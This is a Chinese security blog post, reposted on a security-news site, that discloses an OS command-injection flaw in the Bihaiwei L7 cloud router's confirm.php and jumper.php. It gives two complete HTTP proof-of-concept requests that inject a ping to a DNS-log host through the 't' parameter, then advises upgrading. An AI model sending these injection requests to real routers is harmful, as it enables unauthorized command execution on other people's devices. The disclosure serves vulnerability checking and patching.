【命令执行】碧海威科技-L7云路由

admin 2024年6月28日18:16:04评论6 views字数 1320阅读4分24秒阅读模式
导言

文章仅用作网络安全人员对自己网站、服务器等进行自查检测,不可用于其他用途,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。切勿用于网络攻击!!!
 

PART

漏洞描述

三碧海威科技-L7云路由是一种网络设备,它提供了高速稳定的互联网连接,支持多台设备同时上网,并且具有一些安全功能,如防火墙和数据加密,以保护用户的网络安全。L7云路由特别针对移动设备进行了优化,可以更快地处理网页加载和应用程序响应,提高了用户体验。它还具有易于设置的向导,使新用户能够轻松地配置和管理设备。在其confirm.php、jumper.php文件由于开发设计缺陷导致可以使用";"来拼接命令执行系统命令,造成命令执行漏洞。
漏洞复现

漏洞URL:/notice/confirm.php

漏洞参数:t

漏洞详情:

1、打开自己的服务

【命令执行】碧海威科技-L7云路由

2、使用以下poc进行检测

【命令执行】碧海威科技-L7云路由

POC:

GET /notice/confirm.php?t=;ping%20cnslog.eyes.sh HTTP/1.1Host: 127.0.0.1:1443User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Te: trailersConnection: close

POC2:

GET /notice/jumper.php?t=;ping%20cnslog.eyes.sh HTTP/1.1Host: 127.0.0.1:1443User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Te: trailersConnection: close

3、检查dnslog是否接收到请求

【命令执行】碧海威科技-L7云路由

执行成功

END

修复建议

升级系统至安全版本。

 

原文始发于微信公众号(小羊安全屋):【命令执行】碧海威科技-L7云路由

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月28日18:16:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【命令执行】碧海威科技-L7云路由http://cn-sec.com/archives/2896212.html

发表评论

匿名网友 填写信息